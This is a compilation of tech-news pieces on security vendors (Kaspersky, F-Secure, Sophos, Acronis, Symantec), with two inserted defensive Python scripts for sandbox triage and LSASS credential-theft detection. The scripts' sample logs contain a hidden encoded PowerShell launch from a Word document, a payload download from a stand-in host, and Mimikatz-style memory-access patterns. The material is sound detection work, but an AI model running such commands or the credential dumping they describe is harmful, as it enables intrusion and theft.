
 

Kaspersky Lab’s Choice of Location in Zurich, Switzerland

Switzerland is a top location in terms of the number of secure internet servers available and is known as an innovative center for data processing and high quality IT infrastructure. A non-EU member in the heart of Europe, Switzerland has established its own data privacy regulation that is guaranteed by the state’s constitution and federal laws. There are strict regulations on processing data requests received from authorities.

“Transparency is becoming the new normal for the IT industry– and for the cybersecurity industry in particular. We are proud to be on the front line of this process. As a technological company, we are focused on ensuring the best IT infrastructure for the security of our products and data, and the relocation of key parts of our infrastructure to Switzerland places them in one of the most secure locations in the world.

The promises made in our Global Transparency Initiative are coming to fruition, enhancing the resilience and visibility of our products. Through the new Transparency Center also in Switzerland, trusted partners and governments will be able to see external reviews of our products and make up their own minds. We believe that steps such as these are just the beginning – for the company and for the security industry as a whole. The need to prove trustworthiness will soon become an industry standard.” Eugene Kaspersky, CEO Kaspersky Lab said.

 

Kaspersky Lab’s Next Big Step

Kaspersky Lab has engaged one of the Big Four professional services firms to audit the company’s engineering practices around the creation and distribution of threat detection rule databases, with the goal of independently confirming that they accord with the highest industry security practices.

The assessment will be done under the SSAE 18 standard (Statement on Standards for Attestation Engagements). Its scope covers the regular automatic updates of antivirus records that Kaspersky Lab creates and distributes for its products running on Windows and Unix servers. The company plans to issue the resulting SOC 2 (System and Organization Controls) report in the second quarter of 2019, as part of its ongoing efforts to improve the security of its products with the help of a worldwide community of security enthusiasts.

 


 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Exclusive : Tech ARP Interviews Keith Martin Of F-Secure!

F-Secure Regional Director of APAC and Japan, Keith Martin, flew into Singapore to ink a major regional partnership agreement with ACE Pacific Group. Timothy Shim from Tech Barrista and I had the opportunity to interview Mr. Martin about cybersecurity trends in Asia Pacific and worldwide.

 

Tech ARP Interviews Keith Martin

Keith Martin is the Head of Asia Pacific Corporate Business, F-Secure. Here was our exclusive interview with Mr. Martin after he officially signed the APAC partnership agreement with ACE Pacific Group.

The Cybersecurity Business

Tech ARP : How has your long experience in Japan helped you with F-Secure’s business in Japan?

Keith Martin : Japan is one of the largest markets for F-Secure, and we are trying to replicate that (success) in the APAC region.

Tech ARP : Are you still based in Japan?

Keith Martin : Yes, but I have now racked up a lot of frequent flyer miles.

Tech ARP : What are your thoughts on the cybersecurity market in the APJ (Asia Pacific and Japan) region?

Keith Martin : Japan is a large market, but the growth rates are relatively stable. We look at the Asia Pacific region (which includes India, Australia and New Zealand), as the next source of growth for F-Secure.

Tech ARP : What are your plans, and areas of focus, for the APJ region?

Keith Martin : Without question, Singapore is going to be a major focus for F-Secure, as well as Australia and New Zealand. We just signed a major partnership agreement with ACE Pacific, which will be a cornerstone of our strategy in coming years.

Cybersecurity Backdoors

Tech ARP : Chinese and Russian companies have been hit by accusations of cyber espionage and hacking, loose security and/or inserting backdoors into their products. Do you see this as a good opportunity to promote F-Secure’s products, or is this a poison pill for the entire industry?

Keith Martin : I don’t think it’s a poison pill for the entire industry. I have never seen any direct evidence that these go beyond mere accusations, but I understand the need to be cautious. One of the things that F-Secure is proud of is our policy that we will never add a backdoor into our products.

We are willing to walk away from any business if it means adding a backdoor. This is just the way we operate, because Finland has extremely tough privacy laws.

I think it’s absolutely an opportunity for us to differentiate ourselves (from the other cybersecurity companies) with our public pledge never to add backdoors in our software.

Tech ARP : Some countries like China and Russia are demanding access to encryption keys, and in some cases, requiring registration of VPN services. How do those tightening laws affect F-Secure products like Freedome VPN?

Keith Martin : F-Secure is very focused on maintaining the security of our products, so if those are the requirements, we will decline and get out of those markets. We would rather walk away from the potential business, than compromise the security of our products.

Government Interest

Tech Barrista : On the geopolitical implications of malware, do you feel that governments are increasingly more focused on cybersecurity on a national scale?

Keith Martin : For sure. We now see nation states attacking each other. There’s no denying that fact. Look at Stuxnet, that malware (which was targeted at Iran) got released into the wild and suddenly, people have the technology to use it elsewhere for nefarious purposes. I think that any country that does not pay attention to cybersecurity is sticking their heads into the sand.

Tech Barrista : Do you feel that this presents a greater opportunity for F-Secure?

Keith Martin : It represents opportunity, of course, but our mission as a company is to stop the spread of malware and cybersecurity attacks, wherever they happen. It’s a kind of Catch-22 situation, where we wish that nation states would not attack each other, but yes, we have the opportunity to help them protect themselves against such attacks.


Transparency

Tech ARP : What is F-Secure doing to promote and enhance source code transparency? Like opening up transparency centers?

Keith Martin : At this point in time, there are no plans to do so. We have a very good reputation throughout our 30-year history of being straightforward and upfront. I have never seen any accusations against us of malicious activities.

Tech ARP : Does F-Secure allow corporations or countries with concerns to inspect their code?

Keith Martin : I don’t know of any specific situations in Asia Pacific where F-Secure has allowed this. It may have been allowed in other regions, where governments have specific concerns, but I’m not aware of those situations.

Malware Galore!

Tech ARP : Ransomware and phishing attacks are big problems these days. Can you detail how F-Secure can help users prevent or mitigate the risks of ransomware and/or phishing attacks.

Keith Martin : Third-party analysis of our software shows that we are actually better at detecting these 0-day attacks than any other companies out there. We pride ourselves in detecting not just the malware we know about, but also the malware we don’t know about, using technologies we have been developing over the last 20 years.

We have a multi-layered engine, where we use everything from the basic pattern matching technology, to heuristics, etc. so that if it doesn’t catch the malware on the first layer, it will catch the malware on the second or third or fourth layer.

Tech Barrista : Is malware-as-a-service now common?

Keith Martin : It is becoming more and more common. The entry barrier to launching a malware attack is now much lower due to the ability to outsource the creation of the malware.

Cybersecurity Risks Of IoT Devices

Tech Barrista : With cybercriminals leveraging the Internet of Things and Artificial Intelligence, how much more complex do you see the cybersecurity landscape becoming?

Keith Martin : It’s becoming incredibly complex. Our Chief Research Officer Mikko Hypponen said, “Once you connect something to the Internet, it’s vulnerable”. Billions of devices connected to the Internet become potential attack vectors for cybercriminals.

Most IoT devices don’t have good security. If you can get into one of those devices, you can get into the network through them.

Tech ARP : Does F-Secure have any products to mitigate the risks of poorly-secured IoT devices?

Keith Martin : On the consumer side, we have F-Secure Sense, which protects every device on your network.

 

Keith Martin’s Professional Bio

Keith Martin was Country Manager for F-Secure Japan for two years before being promoted in February 2018 to oversee the entire Asia Pacific region.

Prior to joining F-Secure in 2015, he spent a decade in the telephony and contact center space, first working for four years in Avaya Japan as Director of Multinational Account Sales, followed by six years serving as Japan Country Manager for Interactive Intelligence, a pioneer in cloud contact center technology.

Before that, Keith also spent three years at internet startup ValueCommerce helping build their web hosting platform business before the company was acquired by Yahoo Japan. He got his start at global IT services provider EDS (now HP), delivering IT services to numerous financial industry accounts.


The Kaspersky Cloud Sandbox Service Revealed!

To help companies improve their investigation and response to complex threats, Kaspersky Lab just launched a new service called Kaspersky Cloud Sandbox. It gives businesses the opportunity to take advantage of sandboxes without any additional investments into hardware infrastructure.

The Kaspersky Cloud Sandbox solution is available by subscription as part of the Kaspersky Threat Intelligence Portal. Allowing customers to ‘detonate’ suspicious files in a virtual environment with a full report on the file’s activities, it is designed to boost the efficiency of incident response and cybersecurity forensics without any risks to the company’s IT systems.

 

The Kaspersky Cloud Sandbox Revealed!

Exploiting flaws in legitimate software became a commodity technique for cybercriminals in 2017, because malicious activity can be hidden behind trusted processes. Even an experienced cybersecurity team cannot always be sure it has spotted all the malware using such concealment techniques.

To detect such threats, teams have to be equipped with advanced detection technologies, including sandboxing, which often requires significant hardware investment that many IT security teams cannot easily justify.

With Kaspersky Cloud Sandbox, advanced detection and forensic capabilities are available as a service within the Kaspersky Threat Intelligence Portal, allowing cybersecurity teams to ensure they meet their budget requirements while also benefitting from advanced technology.

The service enables cybersecurity teams and security operations center (SOC) specialists to obtain deep insights into malware behavior and design, detecting targeted cyberthreats that were not identified in the wild.

Advanced anti-evasion techniques: revealing a hidden truth

To lure malware into revealing its harmful potential, a sandbox must implement advanced anti-evasion techniques. A malicious program developed to run in a particular software environment will not detonate on a ‘clean’ virtual machine, and will most probably delete itself without a trace.

To avoid this, Kaspersky Cloud Sandbox applies various user-emulation techniques, such as Windows button clicks, document scrolling and special routine processes that give malware an opportunity to expose itself, as well as randomization of user environment parameters and many others.

Logging system: nothing gets missed in the noise

Once a piece of malware starts its destructive activities, another Kaspersky Cloud Sandbox technology comes into play: its logging subsystem intercepts malicious actions non-invasively.

When a Word document starts to behave suspiciously – for example, building a string in memory, executing shell commands, or dropping payloads (all abnormal activities for a text document) – these events are registered in the Kaspersky Cloud Sandbox logging subsystem.

The subsystem detects a vast spectrum of events, including DLL loading, registry key creation and modification, HTTP and DNS requests, and file creation, deletion and modification. The customer is then provided with a full report containing data visualization graphs and screenshots, as well as a readable sandbox log.

Detection and incident response performance: second to none

Kaspersky Cloud Sandbox detection performance is backed up with big data of real-time threat intelligence from Kaspersky Security Network (KSN), providing customers with immediate status on both known and new threats discovered in the wild.

Advanced behavioral analysis, based on more than 20 years of Kaspersky Lab experience fighting the most complex threats, allows customers to detect previously unseen malicious objects.

As well as getting advanced detection capabilities, SOC experts and researchers can amplify their incident response activities with other services available through the Kaspersky Threat Intelligence Portal.

When performing digital forensics or an incident response, a cybersecurity officer can receive the latest detailed threat intelligence about URLs, domains, IP addresses, file hashes, threat names, statistical/behavior data and WHOIS/DNS data, and then link that knowledge to the IOCs generated by the sample that was analyzed within the cloud sandbox.

APIs to automate its integration into customer security operations are also available, allowing cybersecurity teams to boost their incident investigations in a matter of minutes.
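The article describes the sandbox's logging subsystem registering events (a Word document spawning shell commands, dropping payloads, registry and network activity) and the analyst linking the resulting IOCs to threat intelligence. The following is an added example written for this page, not Kaspersky's code or report format: it replays a constructed JSON-lines event stream for a detonated document, applies behaviour rules to the document's process tree, and returns a scored verdict with the IOCs worth pivoting on. Event field names, rule weights, the sample domain and the sample hash are all this example's own assumptions.

```python
"""Behavioural triage of sandbox events (added example, not Kaspersky code)."""
import json
import re
from dataclasses import dataclass, field

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
EXEC_EXT = (".exe", ".dll", ".scr", ".ps1", ".vbs", ".js")
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
ENCODED_PS = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{8,}", re.IGNORECASE)
WEIGHTS = {"high": 40, "medium": 20, "low": 10}

# Constructed JSON-lines log of a detonated Word document. Field names are this
# example's own, not Kaspersky's format; the domain and hash are fake.
SAMPLE_LOG = r"""
{"t": 1, "type": "process_create", "pid": 100, "ppid": 1, "image": "WINWORD.EXE"}
{"t": 2, "type": "process_create", "pid": 200, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell -nop -w hidden -enc SQBFAFgA"}
{"t": 3, "type": "dns_request", "pid": 200, "query": "update.example-cdn.test"}
{"t": 4, "type": "http_request", "pid": 200, "url": "http://update.example-cdn.test/p.bin"}
{"t": 5, "type": "file_write", "pid": 200, "path": "C:\\Users\\Public\\svchost32.exe", "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}
{"t": 6, "type": "registry_set", "pid": 200, "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "value": "C:\\Users\\Public\\svchost32.exe"}
{"t": 7, "type": "process_create", "pid": 300, "ppid": 200, "image": "svchost32.exe", "path": "C:\\Users\\Public\\svchost32.exe"}
"""

# Constructed control: the same document type doing only what a text document does.
BENIGN_LOG = r"""
{"t": 1, "type": "process_create", "pid": 100, "ppid": 1, "image": "WINWORD.EXE"}
{"t": 2, "type": "file_write", "pid": 100, "path": "C:\\Users\\user\\Documents\\report.docx"}
{"t": 3, "type": "registry_set", "pid": 100, "key": "HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Options\\LastUIOption"}
"""


@dataclass
class Report:
    findings: list = field(default_factory=list)  # (rule_id, severity, detail)
    iocs: dict = field(default_factory=lambda: {"domains": set(), "urls": set(), "sha256": set(), "paths": set()})

    @property
    def score(self) -> int:
        return min(100, sum(WEIGHTS[sev] for _, sev, _ in self.findings))

    @property
    def verdict(self) -> str:
        if self.score >= 60:
            return "malicious"
        return "suspicious" if self.score >= 20 else "clean"


def analyse(log_text: str) -> Report:
    """Replay a sandbox event stream and apply behaviour rules to the document's process tree."""
    report = Report()
    image_of = {}    # pid -> lower-cased image name
    tainted = set()  # pids that are the detonated document or its descendants
    dropped = set()  # lower-cased paths of executables written by tainted processes
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        pid, kind = ev["pid"], ev["type"]
        if kind == "process_create":
            image = ev["image"].lower()
            image_of[pid] = image
            parent = image_of.get(ev["ppid"], "")
            if image in OFFICE_APPS or ev["ppid"] in tainted:
                tainted.add(pid)
            if parent in OFFICE_APPS and image in SHELLS:
                report.findings.append(("office_spawns_shell", "high", f"{parent} -> {image}"))
            if image == "powershell.exe" and ENCODED_PS.search(ev.get("cmdline", "")):
                report.findings.append(("encoded_powershell", "medium", ev["cmdline"]))
            if ev.get("path", "").lower() in dropped:
                report.findings.append(("executes_dropped_file", "high", ev["path"]))
            continue
        if pid not in tainted:
            continue  # activity outside the sample's process tree is background noise
        if kind == "file_write":
            path = ev["path"]
            report.iocs["paths"].add(path)
            if "sha256" in ev:
                report.iocs["sha256"].add(ev["sha256"])
            if path.lower().endswith(EXEC_EXT):
                dropped.add(path.lower())
                report.findings.append(("drops_executable", "medium", path))
        elif kind == "registry_set" and RUN_KEY.search(ev["key"]):
            report.findings.append(("run_key_persistence", "high", ev["key"]))
        elif kind == "dns_request":
            report.iocs["domains"].add(ev["query"].lower())
        elif kind == "http_request":
            report.iocs["urls"].add(ev["url"])
            report.findings.append(("network_from_document", "low", ev["url"]))
    return report


if __name__ == "__main__":
    for name, log in (("sample", SAMPLE_LOG), ("control", BENIGN_LOG)):
        r = analyse(log)
        print(f"{name}: verdict={r.verdict} score={r.score}")
        for rule, sev, detail in r.findings:
            print(f"  [{sev}] {rule}: {detail}")
        print("  IOCs:", {k: sorted(v) for k, v in r.iocs.items() if v})
```

The rules only score activity inside the detonated document's process tree, so background noise from the sandbox OS does not inflate the verdict, and the control log shows that a document writing its own file and touching an Office registry key produces no findings. The domains, URLs and hashes collected in `iocs` are the values an analyst would then look up in a threat intelligence portal, as the article describes.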


 

Sophos Intercept X with Predictive Protection Explained!

Sophos today announced the availability of Intercept X with malware detection powered by advanced deep learning neural networks. Join us for a briefing by Sumit Bansal, Sophos Managing Director for ASEAN and Korea!

 

Sophos Intercept X with Predictive Protection

Combined with new active-hacker mitigation, advanced application lockdown, and enhanced ransomware protection, this latest release of the Sophos Intercept X endpoint protection delivers previously unseen levels of detection and prevention.

Deep learning is the latest evolution of machine learning. It delivers a massively scalable detection model that is able to learn the entire observable threat landscape. With the ability to process hundreds of millions of samples, deep learning can make more accurate predictions at a faster rate with far fewer false-positives when compared to traditional machine learning.

This new version of Sophos Intercept X also includes innovations in anti-ransomware and exploit prevention, and active-hacker mitigations such as credential theft protection. As anti-malware has improved, attacks have increasingly focused on stealing credentials in order to move around systems and networks as a legitimate user, and Intercept X detects and prevents this behavior.

Deployed through the cloud-based management platform Sophos Central, Intercept X can be installed alongside existing endpoint security software from any vendor, immediately boosting endpoint protection. When used with the Sophos XG Firewall, Intercept X can introduce synchronized security capabilities to further enhance protection.

 

New Sophos Intercept X Features

Deep Learning Malware Detection

  • Deep learning model detects known and unknown malware and potentially unwanted applications (PUAs) before they execute, without relying on signatures
  • The model is less than 20 MB and requires infrequent updates

Active Adversary Mitigations

  • Credential theft protection – Preventing theft of authentication passwords and hash information from memory, registry, and persistent storage, as leveraged by such attacks as Mimikatz
  • Code cave utilization – Detects the presence of code deployed into another application, often used for persistence and antivirus avoidance
  • APC protection – Detects abuse of Asynchronous Procedure Calls (APC), often used as part of the AtomBombing code injection technique and more recently as the method of spreading the WannaCry worm and NotPetya wiper via EternalBlue and DoublePulsar (adversaries abuse these calls to get another process to execute malicious code)
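The credential theft bullet above describes blocking reads of authentication secrets from LSASS memory, the behaviour behind Mimikatz. The following is an added example, not Sophos's implementation: it shows how the same behaviour is recognised from endpoint telemetry, here constructed Sysmon Event ID 10 (ProcessAccess) records. The access-right constants come from winnt.h; the allowlist of legitimate LSASS readers, the sample paths, PIDs and call traces are this example's own assumptions and would need tuning per estate.

```python
"""Flagging LSASS memory access from Sysmon Event ID 10 (added example, not Sophos code)."""
import json
from typing import List, Optional

# Process access rights from winnt.h
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF
MEMORY_ACCESS = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION

LSASS = r"c:\windows\system32\lsass.exe"

# Processes that legitimately open LSASS on a typical host (assumption; tune per estate).
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsm.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon Event ID 10 records as JSON lines. Paths, PIDs and call
# traces are invented for illustration.
SAMPLE_EVENTS = r"""
{"SourceImage": "C:\\Windows\\System32\\svchost.exe", "SourceProcessId": 812, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\KERNELBASE.dll+2c4fe"}
{"SourceImage": "C:\\Windows\\System32\\Taskmgr.exe", "SourceProcessId": 4120, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\KERNELBASE.dll+2c4fe"}
{"SourceImage": "C:\\Users\\bob\\Downloads\\mimi.exe", "SourceProcessId": 5520, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\KERNELBASE.dll+2c4fe|C:\\Users\\bob\\Downloads\\mimi.exe+3f21a"}
{"SourceImage": "C:\\Temp\\pd64.exe", "SourceProcessId": 6004, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1fffff", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\dbgcore.dll+1a2b3|C:\\Temp\\pd64.exe+5c10"}
{"SourceImage": "C:\\Windows\\explorer.exe", "SourceProcessId": 3344, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|UNKNOWN(00000221F9A70000)"}
"""


def classify(ev: dict) -> Optional[dict]:
    """Return an alert for a ProcessAccess event that looks like credential theft, else None."""
    if ev["TargetImage"].lower() != LSASS:
        return None
    source = ev["SourceImage"].lower()
    access = int(ev["GrantedAccess"], 16)
    if not access & MEMORY_ACCESS:
        return None  # query-only handles (e.g. Task Manager's 0x1400) cannot read secrets
    if source in ALLOWLIST:
        return None
    reasons = ["opens LSASS with memory access (0x%x)" % access]
    if access in (0x1010, 0x1410):
        reasons.append("access mask matches the common Mimikatz sekurlsa pattern")
    if access & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS requested")
    trace = ev.get("CallTrace", "").lower()
    if "dbgcore.dll" in trace or "dbghelp.dll" in trace:
        reasons.append("call trace passes through MiniDump helpers (procdump-style memory dump)")
    if "unknown(" in trace:
        reasons.append("call trace contains unbacked memory (injected code in the source process)")
    return {"pid": ev["SourceProcessId"], "source": ev["SourceImage"],
            "access": ev["GrantedAccess"], "reasons": reasons}


def triage(json_lines: str) -> List[dict]:
    """Run classify() over a JSON-lines export and keep only the alerts."""
    alerts = []
    for line in json_lines.strip().splitlines():
        alert = classify(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"ALERT pid={a['pid']} {a['source']} access={a['access']}")
        for r in a["reasons"]:
            print("   -", r)
```

The decisive check is the access mask rather than the process name: a handle without PROCESS_VM_READ cannot read LSASS memory, so Task Manager's query-only open is not an alert, while an allowlisted image name is still no excuse once the call trace shows the open coming from unbacked memory, since that indicates code injected into a trusted process.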

New and Enhanced Exploit Prevention Techniques

  • Malicious process migration – Detects remote reflective DLL injection used by adversaries to move between processes running on the system
  • Process privilege escalation – Prevents a low-privilege process from being escalated to a higher privilege, a tactic used to gain elevated system access

Enhanced Application Lockdown

  • Browser behavior lockdown – Intercept X prevents the malicious use of PowerShell from browsers as a basic behavior lockdown
  • HTA application lockdown – HTML applications loaded by the browser will have the lockdown mitigations applied as if they were a browser


FREE Acronis Ransomware Protection For All!

The world is under siege by ransomware attacks. Ransomware doesn’t just put our personal data at risk; it is a serious threat to critical services and even national security. Therefore, we are elated to learn about the new Acronis Ransomware Protection – a free, standalone app that will protect us against ransomware.

 

The Ransomware Threat

Ransomware remains a silent destroyer of data for users worldwide. New strains of ransomware can easily bypass traditional anti-virus software to encrypt user data.

According to a ransomware survey conducted by Acronis earlier this month, 57.5% of the respondents still don’t know that ransomware can wipe their files and disable their computers. Only 9.2% of the respondents had heard about the WannaCry or NotPetya attacks last year, and 37.4% report that they don’t know how to protect their data, or choose to do nothing.

These findings demonstrate a need for an easy, universal ransomware protection solution, and 55.5% of the survey respondents said that they would use one if it was free.

 

Acronis Ransomware Protection

Acronis Ransomware Protection is designed to stop ransomware attacks in real-time, and help users recover their data without paying any ransom. It is compatible with all popular backup and anti-virus programs, and provides an additional level of defense.

In the event of a ransomware attack, Acronis Ransomware Protection blocks the malicious process and notifies the user with a popup. If any files were damaged in the attack, it facilitates the instant recovery of those affected files.

Acronis Ransomware Protection also comes with a cloud backup capability, allowing users to protect important files not only from ransomware, but also from hardware failure, natural disasters and other causes of data loss. Every user receives 5 GB of free Acronis Cloud storage.

Easy to install, Acronis Ransomware Protection is essentially a “set it and forget it” protection solution. The lightweight program (only 20 MB in size) requires limited system resources, which means it can run quietly in the background without affecting system performance.

 

Acronis Active Protection

Acronis Ransomware Protection is based on the Acronis Active Protection technology, which monitors system processes in real time and uses behavioural heuristics to detect a ransomware attack.

These heuristics are constantly improved by machine learning models generated by analysing hundreds of thousands of malicious and legitimate processes in the Acronis Cloud AI infrastructure.

According to Acronis, this AI-based training is “tremendously effective” in defeating all ransomware strains, including zero-day attacks that signature-based solutions cannot detect.

 

Downloading Acronis Ransomware Protection

Acronis Ransomware Protection is currently available only for the Microsoft Windows operating system. Head over to its official page for the FREE download.


Kaspersky Lab Protection For Household 2.0 Revealed!

Kaspersky Lab is not letting its woes with the US Department of Homeland Security distract it from its core business of protecting consumers against cyberthreats. That was the message it conveyed when it presented the Kaspersky Lab protection options for Household 2.0.

 

Household 2.0

The modern home has changed. In the new era of Household 2.0 which consists of 2.4 people and 0.3 pets, there is an average of 6.3 connected devices per house! Yet, the Kaspersky Cybersecurity Index found that 39% of people are leaving their devices unprotected from cyberthreats like hacking, malware, financial fraud and more.

To protect these connected devices that play such a prominent role in Household 2.0, Kaspersky Lab is introducing updated versions of Kaspersky Internet Security and Kaspersky Total Security.

 

Kaspersky Lab Protection For Household 2.0

The updated Kaspersky Internet Security and Kaspersky Total Security come with anti-phishing technology to prevent users from falling victim to fake or spam emails, fake websites and fraud.

In addition, the updated URL Advisor tells a user whether a link in the search engine leads to a trusted, suspicious, dangerous or phishing website, or a website that may cause their computer harm, via a special indicator close to each link.

Many people are also worried about ransomware and the loss of their digital memories. To give them peace of mind, the new Kaspersky Internet Security and Kaspersky Total Security have updated anti-ransomware features.

On mobile devices, the new App Lock feature for Android lets you protect specific apps, such as instant messaging, social media or email, with a secret code. You can also use the Kaspersky Secure Connection service to encrypt your network traffic whenever you use a public or insecure Wi-Fi network.

Children are also increasingly connected to the Internet. To protect them, parents can use Kaspersky Safe Kids parental controls in Kaspersky Total Security to set time limits, restrict applications and prevent access to pages with adult content, obscene language or information on drugs and weapons.

 

The 2018 Kaspersky Lab Product Price List

Product | One Device | Three Devices | Five Devices
Kaspersky Total Security | RM 109 (~US$ 27) | RM 199 (~US$ 49) | NA
Kaspersky Internet Security | RM 100 (~US$ 24) | RM 179 (~US$ 44) | RM 249 (~US$ 68)
Kaspersky Anti-Virus | RM 39.90 (~US$ 9.70) | RM 119 (~US$ 29) | RM 199 (~US$ 49)

 

The Kaspersky Think Security Campaign

In conjunction with the announcement of the new Kaspersky Lab protection for Household 2.0, Techlane Resources, the Kaspersky Lab distributor in Malaysia, announced the Kaspersky Think Security Campaign.

You can now purchase Kaspersky Internet Security 3 Devices 1 Year at RM 179 / ~US$ 44 and get the following Kaspersky products absolutely FREE :

  • Kaspersky Internet Security 1 Device 1 Year,
  • Kaspersky Internet Security for Mac 1 Year, and
  • Kaspersky Internet Security for Android 1 Device 1 Year

You can also purchase Kaspersky Anti-Virus 1 Device 1 Year at RM 39.90 / ~US$ 9.70 and get the following Kaspersky products absolutely FREE :

  • Kaspersky Anti-Virus 1 Device 1 Year,
  • Kaspersky Internet Security for Mac 1 Year, and
  • Kaspersky Internet Security for Android 1 Device 1 Year


The Symantec 2018 Cybersecurity Predictions

David Rajoo, Director of Systems Engineering, Symantec Malaysia, reveals the Symantec 2018 Cybersecurity Predictions. They will help CIOs and cybersecurity experts prepare for the onslaught of cybersecurity threats in 2018.

 

The Symantec 2018 Cybersecurity Predictions

This past year, cyber criminals caused major service disruptions around the world, using their increasing technical proficiency to break through cyber defenses. In 2018, we expect the trend to become more pronounced as these attackers will use machine learning and artificial intelligence to launch even more potent attacks.

Gear up for a busy year ahead. Incidents like the WannaCry attack, which impacted more than 200,000 computers worldwide in May, are just the warmup to a new year of more virulent malware and DDoS attacks. Meanwhile, cyber criminals are poised to step up their attacks on the millions of devices now connected to the Internet of Things both in offices and homes.

The cybersecurity landscape in 2018 is sure to surprise us in ways that we never imagined. As 2017 draws to a close, here is what you can expect over the course of the upcoming year:

 

The Symantec 2018 Cybersecurity Predictions Part 1/3

Blockchain Will Find Uses Outside Of Cryptocurrencies But Cyber criminals Will Focus On Coins and Exchanges

Blockchain is finally finding applications outside of cryptocurrencies, expanding into inter-bank settlements and gaining traction alongside IoT. However, these use cases are still in their infancy and are not the focus for most cyber criminals today.

Instead of attacking Blockchain technology itself, cyber criminals will focus on compromising coin-exchanges and users’ coin-wallets since these are the easiest targets, and provide high returns. Victims will also be tricked into installing coin-miners on their computers and mobile devices, handing their CPU and electricity over to cyber criminals.

 

Cyber criminals Will Use Artificial Intelligence (AI) & Machine Learning (ML) To Conduct Attacks

No cyber security conversation today is complete without a discussion about AI and ML. So far, these conversations have been focused on using these technologies as protection and detection mechanisms. However, this will change in the next year with AI and ML being used by cyber criminals to conduct attacks.

It is the first year where we will see AI versus AI in a cybersecurity context. Cyber criminals will use AI to attack and explore victims’ networks, which is typically the most labour-intensive part of compromise after an incursion.


The Symantec 2018 Cybersecurity Predictions Part 2/3

Supply Chain Attacks Will Become Mainstream

Supply chain attacks have been a mainstay of classical espionage and signals-intelligence operators, who compromise upstream contractors, systems, companies and suppliers. They have proven highly effective, with nation-state actors using human intelligence to compromise the weakest link in the chain.

These attacks are moving into the cybercriminal space, becoming mainstream. With publicly available information on suppliers, contractors, partnerships and key-people, cyber criminals can find victims in the supply chain and attack the weakest link. With a number of high profile successful attacks in 2016 and 2017, cyber criminals will focus on this method in 2018.

 

File-less and File-light Malware Will Explode

2016 and 2017 saw consistent growth in the amount of file-less and file-light malware, with attackers capitalising on organizations that are unprepared for such threats. With fewer Indicators of Compromise (IoCs), use of the victims’ own tools, and complex, disjointed behaviours, these threats have been harder to stop, track and defend against in many scenarios.

Like the early days of ransomware, where early success by a few cyber criminals triggered a gold-rush mentality, more cyber criminals are now rushing to use these same techniques. Although file-less and file-light malware will still be outnumbered by orders of magnitude by traditional malware, they will pose a significant threat and explode in 2018.

 

Organisations Will Still Struggle With Software-as-a-Service (SaaS) Security

Adoption of SaaS continues to grow at an exponential rate as organizations embark on digital transformation projects to drive business agility. This rate of change and adoption presents many security challenges as access control, data control, user behaviour and data encryption vary significantly between SaaS apps. While this is not new and many of the security problems are well understood, organizations will continue to struggle with all these in 2018.

Combined with new privacy and data protections laws adopted by regulators across the world, these will pose major implications in terms of penalties, and more importantly, reputational damage.

 

Organisations Will Still Struggle With Infrastructure-as-a-Service (IaaS) Security – More Breaches Due to Error, Compromise & Design

IaaS has completely changed the way organisations run their operations, offering massive benefits in agility, scalability, innovation and security. It also introduces significant risks, with simple errors that can expose massive amounts of data and take down the entire system.

While security controls above the IaaS layer are the customer’s responsibility, traditional controls do not map well onto IaaS – leading to confusion, errors and design issues, with ineffective or inappropriate controls being applied while new controls are ignored. This will lead to more breaches throughout 2018 as organizations struggle to shift their security programs to be effective on IaaS.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

The Symantec 2018 Cybersecurity Predictions Part 3/3

Financial Trojans Will Still Account For More Losses Than Ransomware

Financial Trojans were some of the first pieces of malware to be monetised by cyber criminals. From simple beginnings as credential harvesting tools, they have since evolved to advanced attack frameworks that target multiple banks, and banking systems that send shadow transactions and hide their tracks. They have proven to be highly profitable for cyber criminals.

Today the move to mobile application-based banking has curtailed some of their effectiveness, so cyber criminals are now moving their attacks to these platforms. Cyber criminals’ profits from Financial Trojans are expected to grow, giving them higher gains than Ransomware attacks.

 

